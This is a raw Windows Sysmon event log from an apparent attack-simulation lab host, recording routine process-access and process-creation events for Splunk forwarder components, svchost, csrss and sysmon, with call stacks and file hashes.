AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EEE6329436DFE6CA7F0C89473B05DDC,SHA256=714A776D6DD3CE2F7B3E6E014EFCD676EFCBC8E534A9BCB22FA8248A5D387BDA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044169Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:49.032{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-180D-629A-1607-000000006002}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044168Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:49.032{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044167Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:49.032{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044166Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:49.032{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044165Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:49.032{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044164Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:49.032{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044163Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:49.032{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044162Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:49.032{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044161Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:49.032{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044160Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:49.032{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044159Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:49.032{0A5DF930-E35B-6299-0500-000000006002}412428C:\Windows\system32\csrss.exe{0A5DF930-180D-629A-1607-000000006002}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044158Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:49.032{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-180D-629A-1607-000000006002}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044157Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:49.036{0A5DF930-180D-629A-1607-000000006002}3508C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000044199Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.954{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-180E-629A-1807-000000006002}1760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044198Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.954{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044197Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.954{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044196Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.954{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044195Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.954{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044194Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.954{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044193Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.954{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044192Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.954{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044191Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.954{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044190Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.954{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044189Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.954{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-180E-629A-1807-000000006002}1760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044188Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.954{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-180E-629A-1807-000000006002}1760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044187Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.954{0A5DF930-180E-629A-1807-000000006002}1760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044186Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:50.922{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program 